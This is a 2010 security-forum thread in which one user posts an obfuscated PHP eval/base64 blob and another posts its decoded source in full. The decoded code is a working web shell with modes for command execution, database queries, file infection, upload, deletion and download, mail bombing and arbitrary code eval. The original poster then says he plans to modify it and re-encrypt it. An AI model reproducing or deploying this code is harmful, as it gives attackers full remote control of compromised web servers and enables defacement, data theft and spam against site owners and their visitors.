|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 77
Members: 0
Total: 77
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Simple base64 Decode |
|
Posted: Sat Feb 20, 2010 7:19 pm |
|
|
capt |
Advanced user |
|
|
Joined: Nov 04, 2008 |
Posts: 232 |
|
|
|
|
|
|
|
Not sure why im having problems with this..
Code: |
eval(gzinflate(base64_decode("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")));
|
|
|
|
|
|
|
|
|
|
Posted: Sat Feb 20, 2010 7:22 pm |
|
|
vince213333 |
Advanced user |
|
|
Joined: Aug 03, 2009 |
Posts: 737 |
Location: Belgium |
|
|
|
|
|
|
Sorry for the missing line linebreaks
Code: | @set_time_limit(0);$modearr=array("cmd","sql","infect","upload","ws_ver","ws_remove","ws_read","ws_save","ws_mail","ws_eval","ws_list","ws_homedir","ws_delete","ws_makedir","ws_rmdir","ws_down");$mode=$_REQUEST['mode'];if(in_array($mode,$modearr)){ function ws_stripslashes($string){if(get_magic_quotes_gpc()){return StripSlashes($string);}else{return $string;}}if($mode=="cmd"){$cmd=$_REQUEST['cmd'];if(function_exists('system')){system($cmd);}elseif(function_exists('exec')){exec($cmd,$output);foreach($output as $line){echo$line."\n";}}elseif(function_exists('shell_exec')){$output=shell_exec($cmd);echo$output;}elseif(function_exists('popen')){$handle=popen($cmd,"r");$read=fread($handle,2096);echo$read;pclose($handle);}}if($mode=="sql"){$host=$_REQUEST['host'];$port=$_REQUEST['port'];$username=$_REQUEST['username'];$password=$_REQUEST['password'];$dbname=$_REQUEST['dbname'];$query=$_REQUEST['query'];$link=mysql_connect($host.":".$port,$username,$password) or die('Could not connect: '.mysql_error());if($_REQUEST['sqlCmd']=="getDbs"){$db_list=mysql_list_dbs($link);while($row=mysql_fetch_object($db_list)){echo"Database: ".$row->Database."\n";}mysql_free_result($db_list);}if($_REQUEST['sqlCmd']=="getTables"){$result=mysql_list_tables($dbname);$num_rows=mysql_num_rows($result);for($i=0;$i<$num_rows;$i++){echo"Table: ".mysql_tablename($result,$i)."\n";}mysql_free_result($result);}if(isset($query)){mysql_select_db($dbname,$link) or die('Could not select database');$result=mysql_query(ws_stripslashes($query)) or die("nInvalid query: ".mysql_error());while($row=mysql_fetch_assoc($result)){echo"Row {\n";foreach($row as $variable=>$value){echo$variable."=".$value."\n";}echo"\n}\n";}}mysql_close($link);}if($mode=="infect"){$handle=fopen($_REQUEST["sourceFile"],"r+") or die("Error reading source file");$contents="";while(!feof($handle)){$contents.=fread($handle,8192);}fclose($handle);$handle=fopen($_REQUEST['infectFile'],"r") or die("Error reading infect file");$contents2=$contents."\n";while(!feof($handle)){$contents2.=fread($handle,8192);}fclose($handle);$fp=fopen($_REQUEST['infectFile'],'w') or die("Error writing infect file");$write=fwrite($fp,$contents2);fclose($fp);if($write){echo$_REQUEST['infectFile']." Infected";}}if($mode == "upload"){if($_FILES){if (is_uploaded_file($_FILES['file']['tmp_name'])){$uploadfile = basename($_FILES['file']['name']);if (move_uploaded_file($_FILES['file']['tmp_name'], $_REQUEST['dir'].$uploadfile)){echo $uploadfile." has been uploaded!.";}else{echo "Upload Failed!!!";}}}}if($mode=="ws_ver"){echo"WebShell PHP Server v3.2";}if($mode=="ws_remove"){$handle=fopen($_REQUEST["file"],"r+") or die("Error reading file");$contents="";while(!feof($handle)){$contents.=fread($handle,8192);}fclose($handle);$contents2=preg_replace('/[<?\s]*eval.*\?>/si','',$contents);if($contents2){$fp=fopen($_REQUEST['file'],'w') or die("Error writing file");$write=fwrite($fp,$contents2);fclose($fp);if($write){echo"WebShell removed from ".$_REQUEST['file'];}}else{echo"Didnt Find Shell";}}if($mode=="ws_read"){$handle=fopen($_REQUEST['file'],"r") or die("Error with reading file");$contents="";while(!feof($handle)){$contents.=fread($handle,8192);}fclose($handle);echo$contents;}if($mode=="ws_save"){$contents=ws_stripslashes($_REQUEST["contents"]);$fp=fopen($_REQUEST['file'],'w') or die("Error writing ".$_REQUEST['file']." file");$write=fwrite($fp,$contents);fclose($fp);if($write){echo$_REQUEST['file']." saved";}}if($mode=="ws_mail"){$mailtimes="1";$headers='From: '.ws_stripslashes($_REQUEST['from']).'';while($mailtimes<=$_REQUEST['times']){mail(ws_stripslashes($_REQUEST['to']),ws_stripslashes($_REQUEST['subject']),ws_stripslashes($_REQUEST['msg']),$headers);$mailtimes++;}echo"Mail Bomb Complete";}if($mode=="ws_eval"){$php=$_REQUEST['php'];eval(base64_decode(ws_stripslashes($php)));}if($mode=="ws_list"){$dir=$_REQUEST['dir'];$hook=opendir($dir) or die('cant open dir');while(false!==($file=readdir($hook))){$fpath=$dir.$file;if(is_dir($fpath)){if($file!='.'&&$file!='..'){echo"Directory: ".$file."\n";}}if($file!='.'&&$file!='..'&&!is_dir($fpath)){echo"File: ".$file."\n";}}}if($mode=="ws_homedir"){echo$_SERVER["DOCUMENT_ROOT"];}if($mode=="ws_delete"){unlink($_REQUEST['file']) or die('Cant delete file');echo"File Deleted";}if($mode=="ws_makedir"){mkdir($_REQUEST['dir'],$_REQUEST['chmod']) or die('Cant create dir');echo"Directory Created";}if($mode=="ws_rmdir"){rmdir($_REQUEST['dir']) or die('Cant remove dir');echo"Directory Removed";}if($mode=="ws_down"){header('Content-type: application/octet-stream');header('Content-Disposition: attachment; filename='.$_REQUEST['file'].'');readfile($_REQUEST['file']);}die();} |
|
|
|
|
|
|
|
|
|
Posted: Sat Feb 20, 2010 7:23 pm |
|
|
capt |
Advanced user |
|
|
Joined: Nov 04, 2008 |
Posts: 232 |
|
|
|
|
|
|
|
Any way you can pm what you used to do this. Because I want to modify it and rencrypt it Thanks Vince for the fast response m8 |
|
|
|
|
Posted: Sat Feb 20, 2010 7:25 pm |
|
|
vince213333 |
Advanced user |
|
|
Joined: Aug 03, 2009 |
Posts: 737 |
Location: Belgium |
|
|
|
|
|
|
Simply using the highlight_string() function instead of the eval() function mostly works |
|
|
|
|
Posted: Sat Feb 20, 2010 7:27 pm |
|
|
capt |
Advanced user |
|
|
Joined: Nov 04, 2008 |
Posts: 232 |
|
|
|
|
|
|
|
Thank you I will look into it ^^ |
|
|
|
|
www.waraxe.us Forum Index -> PHP script decode requests
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|